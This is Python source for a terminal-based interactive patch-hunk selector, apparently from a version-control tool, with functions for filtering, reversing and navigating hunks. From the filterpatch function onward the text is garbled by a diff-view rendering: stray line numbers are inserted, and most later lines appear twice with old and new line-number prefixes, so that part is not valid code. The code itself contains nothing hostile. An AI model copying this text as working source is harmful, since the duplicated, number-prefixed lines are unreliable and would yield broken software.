                if l.applied and l.prettystr().startswith(b'+')
            ]
        )
        rem = len(
            [
                l
                for l in self.changedlines
                if l.applied and l.prettystr().startswith(b'-')
            ]
        )
        return add, rem

    def getfromtoline(self):
        """Return the '@@ -a,b +c,d @@' line for the filtered hunk."""
        # calculate the number of removed lines converted to context lines
        removedconvertedtocontext = self.originalremoved - self.removed

        contextlen = (
            len(self.before) + len(self.after) + removedconvertedtocontext
        )
        # the no-newline marker is not a real context line
        if self.after and self.after[-1] == b'\\ No newline at end of file\n':
            contextlen -= 1
        fromlen = contextlen + self.removed
        tolen = contextlen + self.added

        # diffutils manual, section "2.2.2.2 detailed description of unified
        # format": "an empty hunk is considered to end at the line that
        # precedes the hunk."
        #
        # so, if either of hunks is empty, decrease its line start. --immerrr
        # but only do this if fromline > 0, to avoid having, e.g fromline=-1.
        fromline, toline = self.fromline, self.toline
        if fromline != 0:
            if fromlen == 0:
                fromline -= 1
            if tolen == 0 and toline > 0:
                toline -= 1

        fromtoline = b'@@ -%d,%d +%d,%d @@%s\n' % (
            fromline,
            fromlen,
            toline,
            tolen,
            self.proc and (b' ' + self.proc),
        )
        return fromtoline

    def write(self, fp):
        """Write the filtered hunk (applied lines only) to *fp*."""
        # updated self.added/removed, which are used by getfromtoline()
        self.added, self.removed = self.countchanges()
        fp.write(self.getfromtoline())

        hunklinelist = []
        # add the following to the list: (1) all applied lines, and
        # (2) all unapplied removal lines (convert these to context lines)
        for changedline in self.changedlines:
            changedlinestr = changedline.prettystr()
            if changedline.applied:
                hunklinelist.append(changedlinestr)
            elif changedlinestr.startswith(b"-"):
                hunklinelist.append(b" " + changedlinestr[1:])

        fp.write(b''.join(self.before + hunklinelist + self.after))

    pretty = write

    def prettystr(self):
        x = stringio()
        self.pretty(x)
        return x.getvalue()

    def reversehunk(self):
        """return a recordhunk which is the reverse of the hunk

        Assuming the displayed patch is diff(A, B) result. The returned hunk is
        intended to be applied to B, instead of A.

        For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
        the user made the following selection:

                 0
            [x] -1           [x]: selected
            [ ] -2           [ ]: not selected
            [x] +3
            [ ] +4
            [x] +5
                 6

        This function returns a hunk like:

                 0
                -3
                -4
                -5
                +1
                +4
                 6

        Note "4" was first deleted then added. That's because "4" exists in B
        side and "-4" must exist between "-3" and "-5" to make the patch
        applicable to B.
        """
        dels = []
        adds = []
        for line in self.changedlines:
            text = line.linetext
            if line.applied:
                # an applied '+' must be removed from B; an applied '-'
                # must be re-added to B
                if text.startswith(b'+'):
                    dels.append(text[1:])
                elif text.startswith(b'-'):
                    adds.append(text[1:])
            elif text.startswith(b'+'):
                # unapplied addition: present in B, keep it there by
                # deleting and re-adding (see docstring example with "4")
                dels.append(text[1:])
                adds.append(text[1:])
        hunk = [b'-%s' % l for l in dels] + [b'+%s' % l for l in adds]
        h = self._hunk
        # note the swapped toline/fromline: the result applies to B
        return patchmod.recordhunk(
            h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
        )

    def __getattr__(self, name):
        # delegate anything we don't define to the wrapped hunk
        return getattr(self._hunk, name)

    def __repr__(self):
        return '<hunk %r@%d>' % (self.filename(), self.fromline)
525
524
526
525
def filterpatch(ui, chunks, chunkselector, operation=None):
    """interactively filter patch chunks into applied-only chunks"""
    chunks = list(chunks)
    # convert chunks list into structure suitable for displaying/modifying
    # with curses. create a list of headers only.
    headers = [c for c in chunks if isinstance(c, patchmod.header)]

    # if there are no changed files
    if not headers:
        return [], {}
    uiheaders = [uiheader(h) for h in headers]
    # let user choose headers/hunks/lines, and mark their applied flags
    # accordingly
    ret = chunkselector(ui, uiheaders, operation=operation)
    appliedhunklist = []
    for hdr in uiheaders:
        if not hdr.applied:
            continue
        if not (hdr.special() or [h for h in hdr.hunks if h.applied]):
            continue
        appliedhunklist.append(hdr)
        fixoffset = 0
        for hnk in hdr.hunks:
            if not hnk.applied:
                # de-activated hunks shift later hunks' 'to' lines
                fixoffset += hnk.removed - hnk.added
                continue
            appliedhunklist.append(hnk)
            # adjust the 'to'-line offset of the hunk to be correct
            # after de-activating some of the other hunks for this file
            if fixoffset:
                # hnk = copy.copy(hnk) # necessary??
                hnk.toline += fixoffset

    return (appliedhunklist, ret)
560
559
561
560
def chunkselector(ui, headerlist, operation=None):
    """
    curses interface to get selection of chunks, and mark the applied flags
    of the chosen chunks.
    """
    ui.write(_(b'starting interactive selection\n'))
    chunkselector = curseschunkselector(headerlist, ui, operation)
    # use a fresh object() sentinel (not None) so we can distinguish "never
    # saved a handler" from a saved handler that happened to be None
    origsigtstp = sentinel = object()
    if util.safehasattr(signal, b'SIGTSTP'):
        origsigtstp = signal.getsignal(signal.SIGTSTP)
    try:
        # run curses under the user's LC_CTYPE so ncurses can display
        # non-ASCII characters correctly
        with util.with_lc_ctype():
            curses.wrapper(chunkselector.main)
        if chunkselector.initexc is not None:
            # re-raise an exception captured during curses initialization
            raise chunkselector.initexc
        # ncurses does not restore signal handler for SIGTSTP
    finally:
        if origsigtstp is not sentinel:
            signal.signal(signal.SIGTSTP, origsigtstp)
    return chunkselector.opts
584
581
585
582
586 def testdecorator(testfn, f):
583 def testdecorator(testfn, f):
587 def u(*args, **kwargs):
584 def u(*args, **kwargs):
588 return f(testfn, *args, **kwargs)
585 return f(testfn, *args, **kwargs)
589
586
590 return u
587 return u
591
588
592
589
593 def testchunkselector(testfn, ui, headerlist, operation=None):
590 def testchunkselector(testfn, ui, headerlist, operation=None):
594 """
591 """
595 test interface to get selection of chunks, and mark the applied flags
592 test interface to get selection of chunks, and mark the applied flags
596 of the chosen chunks.
593 of the chosen chunks.
597 """
594 """
598 chunkselector = curseschunkselector(headerlist, ui, operation)
595 chunkselector = curseschunkselector(headerlist, ui, operation)
599
596
600 class dummystdscr(object):
597 class dummystdscr(object):
601 def clear(self):
598 def clear(self):
602 pass
599 pass
603
600
604 def refresh(self):
601 def refresh(self):
605 pass
602 pass
606
603
607 chunkselector.stdscr = dummystdscr()
604 chunkselector.stdscr = dummystdscr()
608 if testfn and os.path.exists(testfn):
605 if testfn and os.path.exists(testfn):
609 testf = open(testfn, 'r')
606 testf = open(testfn, 'r')
610 testcommands = [x.rstrip('\n') for x in testf.readlines()]
607 testcommands = [x.rstrip('\n') for x in testf.readlines()]
611 testf.close()
608 testf.close()
612 while True:
609 while True:
613 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
610 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
614 break
611 break
615 return chunkselector.opts
612 return chunkselector.opts
616
613
617
614
618 _headermessages = { # {operation: text}
615 _headermessages = { # {operation: text}
619 b'apply': _(b'Select hunks to apply'),
616 b'apply': _(b'Select hunks to apply'),
620 b'discard': _(b'Select hunks to discard'),
617 b'discard': _(b'Select hunks to discard'),
621 b'keep': _(b'Select hunks to keep'),
618 b'keep': _(b'Select hunks to keep'),
622 None: _(b'Select hunks to record'),
619 None: _(b'Select hunks to record'),
623 }
620 }
624
621
625
622
626 class curseschunkselector(object):
623 class curseschunkselector(object):
627 def __init__(self, headerlist, ui, operation=None):
624 def __init__(self, headerlist, ui, operation=None):
628 # put the headers into a patch object
625 # put the headers into a patch object
629 self.headerlist = patch(headerlist)
626 self.headerlist = patch(headerlist)
630
627
631 self.ui = ui
628 self.ui = ui
632 self.opts = {}
629 self.opts = {}
633
630
634 self.errorstr = None
631 self.errorstr = None
635 # list of all chunks
632 # list of all chunks
636 self.chunklist = []
633 self.chunklist = []
637 for h in headerlist:
634 for h in headerlist:
638 self.chunklist.append(h)
635 self.chunklist.append(h)
639 self.chunklist.extend(h.hunks)
636 self.chunklist.extend(h.hunks)
640
637
641 # dictionary mapping (fgcolor, bgcolor) pairs to the
638 # dictionary mapping (fgcolor, bgcolor) pairs to the
642 # corresponding curses color-pair value.
639 # corresponding curses color-pair value.
643 self.colorpairs = {}
640 self.colorpairs = {}
644 # maps custom nicknames of color-pairs to curses color-pair values
641 # maps custom nicknames of color-pairs to curses color-pair values
645 self.colorpairnames = {}
642 self.colorpairnames = {}
646
643
647 # Honor color setting of ui section. Keep colored setup as
644 # Honor color setting of ui section. Keep colored setup as
648 # long as not explicitly set to a falsy value - especially,
645 # long as not explicitly set to a falsy value - especially,
649 # when not set at all. This is to stay most compatible with
646 # when not set at all. This is to stay most compatible with
650 # previous (color only) behaviour.
647 # previous (color only) behaviour.
651 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
648 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
652 self.usecolor = uicolor is not False
649 self.usecolor = uicolor is not False
653
650
654 # the currently selected header, hunk, or hunk-line
651 # the currently selected header, hunk, or hunk-line
655 self.currentselecteditem = self.headerlist[0]
652 self.currentselecteditem = self.headerlist[0]
656 self.lastapplieditem = None
653 self.lastapplieditem = None
657
654
658 # updated when printing out patch-display -- the 'lines' here are the
655 # updated when printing out patch-display -- the 'lines' here are the
659 # line positions *in the pad*, not on the screen.
656 # line positions *in the pad*, not on the screen.
660 self.selecteditemstartline = 0
657 self.selecteditemstartline = 0
661 self.selecteditemendline = None
658 self.selecteditemendline = None
662
659
663 # define indentation levels
660 # define indentation levels
664 self.headerindentnumchars = 0
661 self.headerindentnumchars = 0
665 self.hunkindentnumchars = 3
662 self.hunkindentnumchars = 3
666 self.hunklineindentnumchars = 6
663 self.hunklineindentnumchars = 6
667
664
668 # the first line of the pad to print to the screen
665 # the first line of the pad to print to the screen
669 self.firstlineofpadtoprint = 0
666 self.firstlineofpadtoprint = 0
670
667
671 # keeps track of the number of lines in the pad
668 # keeps track of the number of lines in the pad
672 self.numpadlines = None
669 self.numpadlines = None
673
670
674 self.numstatuslines = 1
671 self.numstatuslines = 1
675
672
676 # keep a running count of the number of lines printed to the pad
673 # keep a running count of the number of lines printed to the pad
677 # (used for determining when the selected item begins/ends)
674 # (used for determining when the selected item begins/ends)
678 self.linesprintedtopadsofar = 0
675 self.linesprintedtopadsofar = 0
679
676
680 # stores optional text for a commit comment provided by the user
677 # stores optional text for a commit comment provided by the user
681 self.commenttext = b""
678 self.commenttext = b""
682
679
683 # if the last 'toggle all' command caused all changes to be applied
680 # if the last 'toggle all' command caused all changes to be applied
684 self.waslasttoggleallapplied = True
681 self.waslasttoggleallapplied = True
685
682
686 # affects some ui text
683 # affects some ui text
687 if operation not in _headermessages:
684 if operation not in _headermessages:
688 raise error.ProgrammingError(
685 raise error.ProgrammingError(
689 b'unexpected operation: %s' % operation
686 b'unexpected operation: %s' % operation
690 )
687 )
691 self.operation = operation
688 self.operation = operation
692
689
693 def uparrowevent(self):
690 def uparrowevent(self):
694 """
691 """
695 try to select the previous item to the current item that has the
692 try to select the previous item to the current item that has the
696 most-indented level. for example, if a hunk is selected, try to select
693 most-indented level. for example, if a hunk is selected, try to select
697 the last hunkline of the hunk prior to the selected hunk. or, if
694 the last hunkline of the hunk prior to the selected hunk. or, if
698 the first hunkline of a hunk is currently selected, then select the
695 the first hunkline of a hunk is currently selected, then select the
699 hunk itself.
696 hunk itself.
700 """
697 """
701 currentitem = self.currentselecteditem
698 currentitem = self.currentselecteditem
702
699
703 nextitem = currentitem.previtem()
700 nextitem = currentitem.previtem()
704
701
705 if nextitem is None:
702 if nextitem is None:
706 # if no parent item (i.e. currentitem is the first header), then
703 # if no parent item (i.e. currentitem is the first header), then
707 # no change...
704 # no change...
708 nextitem = currentitem
705 nextitem = currentitem
709
706
710 self.currentselecteditem = nextitem
707 self.currentselecteditem = nextitem
711
708
712 def uparrowshiftevent(self):
709 def uparrowshiftevent(self):
713 """
710 """
714 select (if possible) the previous item on the same level as the
711 select (if possible) the previous item on the same level as the
715 currently selected item. otherwise, select (if possible) the
712 currently selected item. otherwise, select (if possible) the
716 parent-item of the currently selected item.
713 parent-item of the currently selected item.
717 """
714 """
718 currentitem = self.currentselecteditem
715 currentitem = self.currentselecteditem
719 nextitem = currentitem.prevsibling()
716 nextitem = currentitem.prevsibling()
720 # if there's no previous sibling, try choosing the parent
717 # if there's no previous sibling, try choosing the parent
721 if nextitem is None:
718 if nextitem is None:
722 nextitem = currentitem.parentitem()
719 nextitem = currentitem.parentitem()
723 if nextitem is None:
720 if nextitem is None:
724 # if no parent item (i.e. currentitem is the first header), then
721 # if no parent item (i.e. currentitem is the first header), then
725 # no change...
722 # no change...
726 nextitem = currentitem
723 nextitem = currentitem
727
724
728 self.currentselecteditem = nextitem
725 self.currentselecteditem = nextitem
729 self.recenterdisplayedarea()
726 self.recenterdisplayedarea()
730
727
731 def downarrowevent(self):
728 def downarrowevent(self):
732 """
729 """
733 try to select the next item to the current item that has the
730 try to select the next item to the current item that has the
734 most-indented level. for example, if a hunk is selected, select
731 most-indented level. for example, if a hunk is selected, select
735 the first hunkline of the selected hunk. or, if the last hunkline of
732 the first hunkline of the selected hunk. or, if the last hunkline of
736 a hunk is currently selected, then select the next hunk, if one exists,
733 a hunk is currently selected, then select the next hunk, if one exists,
737 or if not, the next header if one exists.
734 or if not, the next header if one exists.
738 """
735 """
739 # self.startprintline += 1 #debug
736 # self.startprintline += 1 #debug
740 currentitem = self.currentselecteditem
737 currentitem = self.currentselecteditem
741
738
742 nextitem = currentitem.nextitem()
739 nextitem = currentitem.nextitem()
743 # if there's no next item, keep the selection as-is
740 # if there's no next item, keep the selection as-is
744 if nextitem is None:
741 if nextitem is None:
745 nextitem = currentitem
742 nextitem = currentitem
746
743
747 self.currentselecteditem = nextitem
744 self.currentselecteditem = nextitem
748
745
749 def downarrowshiftevent(self):
746 def downarrowshiftevent(self):
750 """
747 """
751 select (if possible) the next item on the same level as the currently
748 select (if possible) the next item on the same level as the currently
752 selected item. otherwise, select (if possible) the next item on the
749 selected item. otherwise, select (if possible) the next item on the
753 same level as the parent item of the currently selected item.
750 same level as the parent item of the currently selected item.
754 """
751 """
755 currentitem = self.currentselecteditem
752 currentitem = self.currentselecteditem
756 nextitem = currentitem.nextsibling()
753 nextitem = currentitem.nextsibling()
757 # if there's no next sibling, try choosing the parent's nextsibling
754 # if there's no next sibling, try choosing the parent's nextsibling
758 if nextitem is None:
755 if nextitem is None:
759 try:
756 try:
760 nextitem = currentitem.parentitem().nextsibling()
757 nextitem = currentitem.parentitem().nextsibling()
761 except AttributeError:
758 except AttributeError:
762 # parentitem returned None, so nextsibling() can't be called
759 # parentitem returned None, so nextsibling() can't be called
763 nextitem = None
760 nextitem = None
764 if nextitem is None:
761 if nextitem is None:
765 # if parent has no next sibling, then no change...
762 # if parent has no next sibling, then no change...
766 nextitem = currentitem
763 nextitem = currentitem
767
764
768 self.currentselecteditem = nextitem
765 self.currentselecteditem = nextitem
769 self.recenterdisplayedarea()
766 self.recenterdisplayedarea()
770
767
771 def nextsametype(self, test=False):
768 def nextsametype(self, test=False):
772 currentitem = self.currentselecteditem
769 currentitem = self.currentselecteditem
773 sametype = lambda item: isinstance(item, type(currentitem))
770 sametype = lambda item: isinstance(item, type(currentitem))
774 nextitem = currentitem.nextitem()
771 nextitem = currentitem.nextitem()
775
772
776 while nextitem is not None and not sametype(nextitem):
773 while nextitem is not None and not sametype(nextitem):
777 nextitem = nextitem.nextitem()
774 nextitem = nextitem.nextitem()
778
775
779 if nextitem is None:
776 if nextitem is None:
780 nextitem = currentitem
777 nextitem = currentitem
781 else:
778 else:
782 parent = nextitem.parentitem()
779 parent = nextitem.parentitem()
783 if parent is not None and parent.folded:
780 if parent is not None and parent.folded:
784 self.togglefolded(parent)
781 self.togglefolded(parent)
785
782
786 self.currentselecteditem = nextitem
783 self.currentselecteditem = nextitem
787 if not test:
784 if not test:
788 self.recenterdisplayedarea()
785 self.recenterdisplayedarea()
789
786
790 def rightarrowevent(self):
787 def rightarrowevent(self):
791 """
788 """
792 select (if possible) the first of this item's child-items.
789 select (if possible) the first of this item's child-items.
793 """
790 """
794 currentitem = self.currentselecteditem
791 currentitem = self.currentselecteditem
795 nextitem = currentitem.firstchild()
792 nextitem = currentitem.firstchild()
796
793
797 # turn off folding if we want to show a child-item
794 # turn off folding if we want to show a child-item
798 if currentitem.folded:
795 if currentitem.folded:
799 self.togglefolded(currentitem)
796 self.togglefolded(currentitem)
800
797
801 if nextitem is None:
798 if nextitem is None:
802 # if no next item on parent-level, then no change...
799 # if no next item on parent-level, then no change...
803 nextitem = currentitem
800 nextitem = currentitem
804
801
805 self.currentselecteditem = nextitem
802 self.currentselecteditem = nextitem
806
803
807 def leftarrowevent(self):
804 def leftarrowevent(self):
808 """
805 """
809 if the current item can be folded (i.e. it is an unfolded header or
806 if the current item can be folded (i.e. it is an unfolded header or
810 hunk), then fold it. otherwise try select (if possible) the parent
807 hunk), then fold it. otherwise try select (if possible) the parent
811 of this item.
808 of this item.
812 """
809 """
813 currentitem = self.currentselecteditem
810 currentitem = self.currentselecteditem
814
811
815 # try to fold the item
812 # try to fold the item
816 if not isinstance(currentitem, uihunkline):
813 if not isinstance(currentitem, uihunkline):
817 if not currentitem.folded:
814 if not currentitem.folded:
818 self.togglefolded(item=currentitem)
815 self.togglefolded(item=currentitem)
819 return
816 return
820
817
821 # if it can't be folded, try to select the parent item
818 # if it can't be folded, try to select the parent item
822 nextitem = currentitem.parentitem()
819 nextitem = currentitem.parentitem()
823
820
824 if nextitem is None:
821 if nextitem is None:
825 # if no item on parent-level, then no change...
822 # if no item on parent-level, then no change...
826 nextitem = currentitem
823 nextitem = currentitem
827 if not nextitem.folded:
824 if not nextitem.folded:
828 self.togglefolded(item=nextitem)
825 self.togglefolded(item=nextitem)
829
826
830 self.currentselecteditem = nextitem
827 self.currentselecteditem = nextitem
831
828
832 def leftarrowshiftevent(self):
829 def leftarrowshiftevent(self):
833 """
830 """
834 select the header of the current item (or fold current item if the
831 select the header of the current item (or fold current item if the
835 current item is already a header).
832 current item is already a header).
836 """
833 """
837 currentitem = self.currentselecteditem
834 currentitem = self.currentselecteditem
838
835
839 if isinstance(currentitem, uiheader):
836 if isinstance(currentitem, uiheader):
840 if not currentitem.folded:
837 if not currentitem.folded:
841 self.togglefolded(item=currentitem)
838 self.togglefolded(item=currentitem)
842 return
839 return
843
840
844 # select the parent item recursively until we're at a header
841 # select the parent item recursively until we're at a header
845 while True:
842 while True:
846 nextitem = currentitem.parentitem()
843 nextitem = currentitem.parentitem()
847 if nextitem is None:
844 if nextitem is None:
848 break
845 break
849 else:
846 else:
850 currentitem = nextitem
847 currentitem = nextitem
851
848
852 self.currentselecteditem = currentitem
849 self.currentselecteditem = currentitem
853
850
854 def updatescroll(self):
851 def updatescroll(self):
855 """scroll the screen to fully show the currently-selected"""
852 """scroll the screen to fully show the currently-selected"""
856 selstart = self.selecteditemstartline
853 selstart = self.selecteditemstartline
857 selend = self.selecteditemendline
854 selend = self.selecteditemendline
858
855
859 padstart = self.firstlineofpadtoprint
856 padstart = self.firstlineofpadtoprint
860 padend = padstart + self.yscreensize - self.numstatuslines - 1
857 padend = padstart + self.yscreensize - self.numstatuslines - 1
861 # 'buffered' pad start/end values which scroll with a certain
858 # 'buffered' pad start/end values which scroll with a certain
862 # top/bottom context margin
859 # top/bottom context margin
863 padstartbuffered = padstart + 3
860 padstartbuffered = padstart + 3
864 padendbuffered = padend - 3
861 padendbuffered = padend - 3
865
862
866 if selend > padendbuffered:
863 if selend > padendbuffered:
867 self.scrolllines(selend - padendbuffered)
864 self.scrolllines(selend - padendbuffered)
868 elif selstart < padstartbuffered:
865 elif selstart < padstartbuffered:
869 # negative values scroll in pgup direction
866 # negative values scroll in pgup direction
870 self.scrolllines(selstart - padstartbuffered)
867 self.scrolllines(selstart - padstartbuffered)
871
868
872 def scrolllines(self, numlines):
869 def scrolllines(self, numlines):
873 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
870 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
874 self.firstlineofpadtoprint += numlines
871 self.firstlineofpadtoprint += numlines
875 if self.firstlineofpadtoprint < 0:
872 if self.firstlineofpadtoprint < 0:
876 self.firstlineofpadtoprint = 0
873 self.firstlineofpadtoprint = 0
877 if self.firstlineofpadtoprint > self.numpadlines - 1:
874 if self.firstlineofpadtoprint > self.numpadlines - 1:
878 self.firstlineofpadtoprint = self.numpadlines - 1
875 self.firstlineofpadtoprint = self.numpadlines - 1
879
876
880 def toggleapply(self, item=None):
877 def toggleapply(self, item=None):
881 """
878 """
882 toggle the applied flag of the specified item. if no item is specified,
879 toggle the applied flag of the specified item. if no item is specified,
883 toggle the flag of the currently selected item.
880 toggle the flag of the currently selected item.
884 """
881 """
885 if item is None:
882 if item is None:
886 item = self.currentselecteditem
883 item = self.currentselecteditem
887 # Only set this when NOT using 'toggleall'
884 # Only set this when NOT using 'toggleall'
888 self.lastapplieditem = item
885 self.lastapplieditem = item
889
886
890 item.applied = not item.applied
887 item.applied = not item.applied
891
888
892 if isinstance(item, uiheader):
889 if isinstance(item, uiheader):
893 item.partial = False
890 item.partial = False
894 if item.applied:
891 if item.applied:
895 # apply all its hunks
892 # apply all its hunks
896 for hnk in item.hunks:
893 for hnk in item.hunks:
897 hnk.applied = True
894 hnk.applied = True
898 # apply all their hunklines
895 # apply all their hunklines
899 for hunkline in hnk.changedlines:
896 for hunkline in hnk.changedlines:
900 hunkline.applied = True
897 hunkline.applied = True
901 else:
898 else:
902 # un-apply all its hunks
899 # un-apply all its hunks
903 for hnk in item.hunks:
900 for hnk in item.hunks:
904 hnk.applied = False
901 hnk.applied = False
905 hnk.partial = False
902 hnk.partial = False
906 # un-apply all their hunklines
903 # un-apply all their hunklines
907 for hunkline in hnk.changedlines:
904 for hunkline in hnk.changedlines:
908 hunkline.applied = False
905 hunkline.applied = False
909 elif isinstance(item, uihunk):
906 elif isinstance(item, uihunk):
910 item.partial = False
907 item.partial = False
911 # apply all it's hunklines
908 # apply all it's hunklines
912 for hunkline in item.changedlines:
909 for hunkline in item.changedlines:
913 hunkline.applied = item.applied
910 hunkline.applied = item.applied
914
911
915 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
912 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
916 allsiblingsapplied = not (False in siblingappliedstatus)
913 allsiblingsapplied = not (False in siblingappliedstatus)
917 nosiblingsapplied = not (True in siblingappliedstatus)
914 nosiblingsapplied = not (True in siblingappliedstatus)
918
915
919 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
916 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
920 somesiblingspartial = True in siblingspartialstatus
917 somesiblingspartial = True in siblingspartialstatus
921
918
922 # cases where applied or partial should be removed from header
919 # cases where applied or partial should be removed from header
923
920
924 # if no 'sibling' hunks are applied (including this hunk)
921 # if no 'sibling' hunks are applied (including this hunk)
925 if nosiblingsapplied:
922 if nosiblingsapplied:
926 if not item.header.special():
923 if not item.header.special():
927 item.header.applied = False
924 item.header.applied = False
928 item.header.partial = False
925 item.header.partial = False
929 else: # some/all parent siblings are applied
926 else: # some/all parent siblings are applied
930 item.header.applied = True
927 item.header.applied = True
931 item.header.partial = (
928 item.header.partial = (
932 somesiblingspartial or not allsiblingsapplied
929 somesiblingspartial or not allsiblingsapplied
933 )
930 )
934
931
935 elif isinstance(item, uihunkline):
932 elif isinstance(item, uihunkline):
936 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
933 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
937 allsiblingsapplied = not (False in siblingappliedstatus)
934 allsiblingsapplied = not (False in siblingappliedstatus)
938 nosiblingsapplied = not (True in siblingappliedstatus)
935 nosiblingsapplied = not (True in siblingappliedstatus)
939
936
940 # if no 'sibling' lines are applied
937 # if no 'sibling' lines are applied
941 if nosiblingsapplied:
938 if nosiblingsapplied:
942 item.hunk.applied = False
939 item.hunk.applied = False
943 item.hunk.partial = False
940 item.hunk.partial = False
944 elif allsiblingsapplied:
941 elif allsiblingsapplied:
945 item.hunk.applied = True
942 item.hunk.applied = True
946 item.hunk.partial = False
943 item.hunk.partial = False
947 else: # some siblings applied
944 else: # some siblings applied
948 item.hunk.applied = True
945 item.hunk.applied = True
949 item.hunk.partial = True
946 item.hunk.partial = True
950
947
951 parentsiblingsapplied = [
948 parentsiblingsapplied = [
952 hnk.applied for hnk in item.hunk.header.hunks
949 hnk.applied for hnk in item.hunk.header.hunks
953 ]
950 ]
954 noparentsiblingsapplied = not (True in parentsiblingsapplied)
951 noparentsiblingsapplied = not (True in parentsiblingsapplied)
955 allparentsiblingsapplied = not (False in parentsiblingsapplied)
952 allparentsiblingsapplied = not (False in parentsiblingsapplied)
956
953
957 parentsiblingspartial = [
954 parentsiblingspartial = [
958 hnk.partial for hnk in item.hunk.header.hunks
955 hnk.partial for hnk in item.hunk.header.hunks
959 ]
956 ]
960 someparentsiblingspartial = True in parentsiblingspartial
957 someparentsiblingspartial = True in parentsiblingspartial
961
958
962 # if all parent hunks are not applied, un-apply header
959 # if all parent hunks are not applied, un-apply header
963 if noparentsiblingsapplied:
960 if noparentsiblingsapplied:
964 if not item.hunk.header.special():
961 if not item.hunk.header.special():
965 item.hunk.header.applied = False
962 item.hunk.header.applied = False
966 item.hunk.header.partial = False
963 item.hunk.header.partial = False
967 # set the applied and partial status of the header if needed
964 # set the applied and partial status of the header if needed
968 else: # some/all parent siblings are applied
965 else: # some/all parent siblings are applied
969 item.hunk.header.applied = True
966 item.hunk.header.applied = True
970 item.hunk.header.partial = (
967 item.hunk.header.partial = (
971 someparentsiblingspartial or not allparentsiblingsapplied
968 someparentsiblingspartial or not allparentsiblingsapplied
972 )
969 )
973
970
974 def toggleall(self):
971 def toggleall(self):
975 """toggle the applied flag of all items."""
972 """toggle the applied flag of all items."""
976 if self.waslasttoggleallapplied: # then unapply them this time
973 if self.waslasttoggleallapplied: # then unapply them this time
977 for item in self.headerlist:
974 for item in self.headerlist:
978 if item.applied:
975 if item.applied:
979 self.toggleapply(item)
976 self.toggleapply(item)
980 else:
977 else:
981 for item in self.headerlist:
978 for item in self.headerlist:
982 if not item.applied:
979 if not item.applied:
983 self.toggleapply(item)
980 self.toggleapply(item)
984 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
981 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
985
982
986 def flipselections(self):
983 def flipselections(self):
987 """
984 """
988 Flip all selections. Every selected line is unselected and vice
985 Flip all selections. Every selected line is unselected and vice
989 versa.
986 versa.
990 """
987 """
991 for header in self.headerlist:
988 for header in self.headerlist:
992 for hunk in header.allchildren():
989 for hunk in header.allchildren():
993 for line in hunk.allchildren():
990 for line in hunk.allchildren():
994 self.toggleapply(line)
991 self.toggleapply(line)
995
992
996 def toggleallbetween(self):
993 def toggleallbetween(self):
997 """toggle applied on or off for all items in range [lastapplied,
994 """toggle applied on or off for all items in range [lastapplied,
998 current]. """
995 current]. """
999 if (
996 if (
1000 not self.lastapplieditem
997 not self.lastapplieditem
1001 or self.currentselecteditem == self.lastapplieditem
998 or self.currentselecteditem == self.lastapplieditem
1002 ):
999 ):
1003 # Treat this like a normal 'x'/' '
1000 # Treat this like a normal 'x'/' '
1004 self.toggleapply()
1001 self.toggleapply()
1005 return
1002 return
1006
1003
1007 startitem = self.lastapplieditem
1004 startitem = self.lastapplieditem
1008 enditem = self.currentselecteditem
1005 enditem = self.currentselecteditem
1009 # Verify that enditem is "after" startitem, otherwise swap them.
1006 # Verify that enditem is "after" startitem, otherwise swap them.
1010 for direction in [b'forward', b'reverse']:
1007 for direction in [b'forward', b'reverse']:
1011 nextitem = startitem.nextitem()
1008 nextitem = startitem.nextitem()
1012 while nextitem and nextitem != enditem:
1009 while nextitem and nextitem != enditem:
1013 nextitem = nextitem.nextitem()
1010 nextitem = nextitem.nextitem()
1014 if nextitem:
1011 if nextitem:
1015 break
1012 break
1016 # Looks like we went the wrong direction :)
1013 # Looks like we went the wrong direction :)
1017 startitem, enditem = enditem, startitem
1014 startitem, enditem = enditem, startitem
1018
1015
1019 if not nextitem:
1016 if not nextitem:
1020 # We didn't find a path going either forward or backward? Don't know
1017 # We didn't find a path going either forward or backward? Don't know
1021 # how this can happen, let's not crash though.
1018 # how this can happen, let's not crash though.
1022 return
1019 return
1023
1020
1024 nextitem = startitem
1021 nextitem = startitem
1025 # Switch all items to be the opposite state of the currently selected
1022 # Switch all items to be the opposite state of the currently selected
1026 # item. Specifically:
1023 # item. Specifically:
1027 # [ ] startitem
1024 # [ ] startitem
1028 # [x] middleitem
1025 # [x] middleitem
1029 # [ ] enditem <-- currently selected
1026 # [ ] enditem <-- currently selected
1030 # This will turn all three on, since the currently selected item is off.
1027 # This will turn all three on, since the currently selected item is off.
1031 # This does *not* invert each item (i.e. middleitem stays marked/on)
1028 # This does *not* invert each item (i.e. middleitem stays marked/on)
1032 desiredstate = not self.currentselecteditem.applied
1029 desiredstate = not self.currentselecteditem.applied
1033 while nextitem != enditem.nextitem():
1030 while nextitem != enditem.nextitem():
1034 if nextitem.applied != desiredstate:
1031 if nextitem.applied != desiredstate:
1035 self.toggleapply(item=nextitem)
1032 self.toggleapply(item=nextitem)
1036 nextitem = nextitem.nextitem()
1033 nextitem = nextitem.nextitem()
1037
1034
1038 def togglefolded(self, item=None, foldparent=False):
1035 def togglefolded(self, item=None, foldparent=False):
1039 """toggle folded flag of specified item (defaults to currently
1036 """toggle folded flag of specified item (defaults to currently
1040 selected)"""
1037 selected)"""
1041 if item is None:
1038 if item is None:
1042 item = self.currentselecteditem
1039 item = self.currentselecteditem
1043 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1040 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1044 if not isinstance(item, uiheader):
1041 if not isinstance(item, uiheader):
1045 # we need to select the parent item in this case
1042 # we need to select the parent item in this case
1046 self.currentselecteditem = item = item.parentitem()
1043 self.currentselecteditem = item = item.parentitem()
